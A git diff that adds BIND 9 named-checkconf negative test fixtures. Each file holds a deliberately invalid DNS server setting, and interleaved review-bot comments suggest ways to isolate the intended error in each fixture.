+};
diff --git a/bin/tests/system/checkconf/bad-maxratio1.conf b/bin/tests/system/checkconf/bad-maxratio1.conf
new file mode 100644
index 0000000..b6f6420
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxratio1.conf
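Review bot: bad-maxncachettl-3.conf carries two independently invalid values, `max-ncache-ttl 4000000000;` in view "three" and `max-ncache-ttl -1;` in view "four", and the second is already the whole content of bad-maxncachettl-4.conf. If the test only requires that the checker rejects the file (which is how the bad-*.conf fixtures appear to be used), a regression in the upper-bound check would go unnoticed because the negative value still makes the file fail. Keeping only view "three" here, that is dropping the three lines `view four {`, `max-ncache-ttl -1;` and `};`, gives each limit its own fixture.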
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ masterfile-format map;
+ file "example.db";
+ max-ixfr-ratio 0.9;
+};
diff --git a/bin/tests/system/checkconf/bad-maxratio2.conf b/bin/tests/system/checkconf/bad-maxratio2.conf
new file mode 100644
index 0000000..54fec84
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxratio2.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ masterfile-format map;
+ file "example.db";
+ max-ixfr-ratio 0%;
+};
diff --git a/bin/tests/system/checkconf/bad-maxttlmap.conf b/bin/tests/system/checkconf/bad-maxttlmap.conf
new file mode 100644
index 0000000..b2d8043
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxttlmap.conf
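Review bot: In bad-maxratio1.conf the line `masterfile-format map;` looks unrelated to the setting the file name points at, `max-ixfr-ratio 0.9;`, and bad-maxratio2.conf repeats it next to `max-ixfr-ratio 0%;`. bad-maxttlmap.conf in the same diff uses that very format as part of the combination it expects to be rejected, so a checker that objects to the map format for any reason would make both ratio fixtures fail without the ratio value ever being validated. Dropping the `masterfile-format map;` line from the two ratio files would pin the failure to the intended option; neither file has a comment naming the expected error, so a short one stating which value is invalid and why would also help.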
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ masterfile-format map;
+ file "example.db";
+ max-zone-ttl 3600;
+};
diff --git a/bin/tests/system/checkconf/bad-mincachettl.conf b/bin/tests/system/checkconf/bad-mincachettl.conf
new file mode 100644
index 0000000..cd02c66
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-mincachettl.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ min-cache-ttl 1x;
+};
diff --git a/bin/tests/system/checkconf/bad-minncachettl.conf b/bin/tests/system/checkconf/bad-minncachettl.conf
new file mode 100644
index 0000000..1148bcc
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-minncachettl.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ min-ncache-ttl 1x;
+};
diff --git a/bin/tests/system/checkconf/bad-mirror-allow-recursion-none.conf b/bin/tests/system/checkconf/bad-mirror-allow-recursion-none.conf
new file mode 100644
index 0000000..351b3dd
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-mirror-allow-recursion-none.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ recursion yes;
+ allow-recursion { none; };
+};
+
+zone "." {
+ type mirror;
+ masters { 127.0.0.1; };
+};
diff --git a/bin/tests/system/checkconf/bad-mirror-explicit-notify-yes.conf b/bin/tests/system/checkconf/bad-mirror-explicit-notify-yes.conf
new file mode 100644
index 0000000..27ad850
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-mirror-explicit-notify-yes.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type mirror;
+ notify yes;
+};
diff --git a/bin/tests/system/checkconf/bad-mirror-non-root-zone-without-masters.conf b/bin/tests/system/checkconf/bad-mirror-non-root-zone-without-masters.conf
new file mode 100644
index 0000000..c9c8b03
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-mirror-non-root-zone-without-masters.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "foo." {
+ type mirror;
+};
diff --git a/bin/tests/system/checkconf/bad-mirror-recursion-no.conf b/bin/tests/system/checkconf/bad-mirror-recursion-no.conf
new file mode 100644
index 0000000..f5536ac
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-mirror-recursion-no.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ recursion no;
+};
+
+zone "." {
+ type mirror;
+};
diff --git a/bin/tests/system/checkconf/bad-mirror-zonename.conf b/bin/tests/system/checkconf/bad-mirror-zonename.conf
new file mode 100644
index 0000000..6fc11c1
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-mirror-zonename.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "\0example" {
+ type mirror;
+ file "example.db";
+};
diff --git a/bin/tests/system/checkconf/bad-noddns.conf b/bin/tests/system/checkconf/bad-noddns.conf
new file mode 100644
index 0000000..0e45c5c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-noddns.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type master;
+ file "example.db";
+ auto-dnssec maintain;
+ allow-update { none; };
+};
diff --git a/bin/tests/system/checkconf/bad-notify-source-v6.conf b/bin/tests/system/checkconf/bad-notify-source-v6.conf
new file mode 100644
index 0000000..ef53c96
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-notify-source-v6.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ notify-source-v6 fd92:7065:b8e:ffff::1 port 5300;
+};
diff --git a/bin/tests/system/checkconf/bad-notify-source.conf b/bin/tests/system/checkconf/bad-notify-source.conf
new file mode 100644
index 0000000..b950784
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-notify-source.conf
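Review bot: bad-notify-source-v6.conf does not say which statement is expected to be rejected; the only conflict visible in the file is that `notify-source-v6 ... port 5300` reuses the `port 5300` set in `options`, so that is presumably the condition under test. A one-line comment above the zone, for example `// notify-source-v6 must not reuse the server's listening port`, would stop a later edit from quietly turning this into a valid configuration and weakening the check. bad-notify-source.conf, bad-parental-source-v6.conf and bad-parental-source.conf later in this diff follow the same pattern and would benefit from the same comment.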
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ notify-source 10.53.0.1 port 5300;
+};
diff --git a/bin/tests/system/checkconf/bad-options-also-notify.conf b/bin/tests/system/checkconf/bad-options-also-notify.conf
new file mode 100644
index 0000000..74714f7
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-options-also-notify.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ also-notify { missing; };
+};
+
+zone "example.net" {
+ type slave;
+ masters { 192.168.1.1; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-options.conf b/bin/tests/system/checkconf/bad-parental-agents-def-options.conf
new file mode 100644
index 0000000..2091155
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-def-options.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ parental-agents { 192.168.1.2; };
+};
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-view.conf b/bin/tests/system/checkconf/bad-parental-agents-def-view.conf
new file mode 100644
index 0000000..47c062a
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-def-view.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "test" {
+ parental-agents { 192.168.1.2; };
+ zone "example.net" {
+ type primary;
+ file "example.net.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-view2.conf b/bin/tests/system/checkconf/bad-parental-agents-def-view2.conf
new file mode 100644
index 0000000..aa65a4d
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-def-view2.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "test" {
+ parental-agents "net" {
+ 192.168.1.2;
+ };
+ zone "example.net" {
+ type primary;
+ file "example.net.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-zone.conf b/bin/tests/system/checkconf/bad-parental-agents-def-zone.conf
new file mode 100644
index 0000000..e2a8389
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-def-zone.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+ parental-agents "net" { 192.168.1.1; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-dup.conf b/bin/tests/system/checkconf/bad-parental-agents-dup.conf
new file mode 100644
index 0000000..cb5ac44
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-dup.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+ parental-agents { 192.168.1.1; };
+ parental-agents { 192.168.1.1; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-dupdef.conf b/bin/tests/system/checkconf/bad-parental-agents-dupdef.conf
new file mode 100644
index 0000000..7ca88f7
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-dupdef.conf
@@ -0,0 +1,26 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+parental-agents "net" {
+ 192.168.1.1;
+};
+
+parental-agents "net" {
+ 192.168.1.2;
+};
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+ parental-agents { "net"; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-empty.conf b/bin/tests/system/checkconf/bad-parental-agents-empty.conf
new file mode 100644
index 0000000..f61de06
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-empty.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+parental-agents "net" { };
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+ parental-agents { "net"; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-empty2.conf b/bin/tests/system/checkconf/bad-parental-agents-empty2.conf
new file mode 100644
index 0000000..93b8f7b
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-empty2.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+ parental-agents { };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-mirror.conf b/bin/tests/system/checkconf/bad-parental-agents-mirror.conf
new file mode 100644
index 0000000..62926e2
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-mirror.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type mirror;
+ file "root.mirror";
+ parental-agents { 192.168.1.1; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-agents-notfound.conf b/bin/tests/system/checkconf/bad-parental-agents-notfound.conf
new file mode 100644
index 0000000..98075c4
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-agents-notfound.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+parental-agents "com" {
+ 192.168.1.2;
+};
+
+zone "example.net" {
+ type primary;
+ file "example.net.db";
+ parental-agents { "net"; };
+};
diff --git a/bin/tests/system/checkconf/bad-parental-source-v6.conf b/bin/tests/system/checkconf/bad-parental-source-v6.conf
new file mode 100644
index 0000000..1b053d0
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-source-v6.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ parental-source-v6 fd92:7065:b8e:ffff::1 port 5300;
+};
diff --git a/bin/tests/system/checkconf/bad-parental-source.conf b/bin/tests/system/checkconf/bad-parental-source.conf
new file mode 100644
index 0000000..9587b3e
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-parental-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ parental-source 10.53.0.1 port 5300;
+};
diff --git a/bin/tests/system/checkconf/bad-port.conf b/bin/tests/system/checkconf/bad-port.conf
new file mode 100644
index 0000000..9650c8f
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-port.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 99999;
+};
diff --git a/bin/tests/system/checkconf/bad-primaries-key.conf b/bin/tests/system/checkconf/bad-primaries-key.conf
new file mode 100644
index 0000000..f592293
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-primaries-key.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4 key a..b; };
+};
diff --git a/bin/tests/system/checkconf/bad-primaries-notfound.conf b/bin/tests/system/checkconf/bad-primaries-notfound.conf
new file mode 100644
index 0000000..4640098
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-primaries-notfound.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+primaries "net" {
+ 192.168.1.2;
+};
+
+zone "example.net" {
+ type secondary;
+ primaries { "foo"; };
+};
diff --git a/bin/tests/system/checkconf/bad-printtime.conf b/bin/tests/system/checkconf/bad-printtime.conf
new file mode 100644
index 0000000..80a53cb
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-printtime.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+logging {
+ channel one {
+ file "one.out";
+ print-time bogus;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-acl.conf b/bin/tests/system/checkconf/bad-rate-limit-acl.conf
new file mode 100644
index 0000000..06543fb
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-acl.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ responses-per-second 10;
+ exempt-clients { localhost; localnets; unknownacl; };
+ log-only yes;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-all-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-all-per-second.conf
new file mode 100644
index 0000000..aae353e
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-all-per-second.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ all-per-second 1001; // greater than DNS_RRL_MAX_RATE
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-errors-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-errors-per-second.conf
new file mode 100644
index 0000000..b2c6097
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-errors-per-second.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ errors-per-second 1001; // greater than DNS_RRL_MAX_RATE
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-ipv4-prefix-length.conf b/bin/tests/system/checkconf/bad-rate-limit-ipv4-prefix-length.conf
new file mode 100644
index 0000000..b728575
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-ipv4-prefix-length.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ ipv4-prefix-length 33; // greater than bits in address
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-ipv6-prefix-length.conf b/bin/tests/system/checkconf/bad-rate-limit-ipv6-prefix-length.conf
new file mode 100644
index 0000000..6b5fda5
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-ipv6-prefix-length.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ ipv6-prefix-length 65; // max 64
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-max-table-size.conf b/bin/tests/system/checkconf/bad-rate-limit-max-table-size.conf
new file mode 100644
index 0000000..95309db
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-max-table-size.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ max-table-size 30; // less than min-table-size default of 500
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-nodata-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-nodata-per-second.conf
new file mode 100644
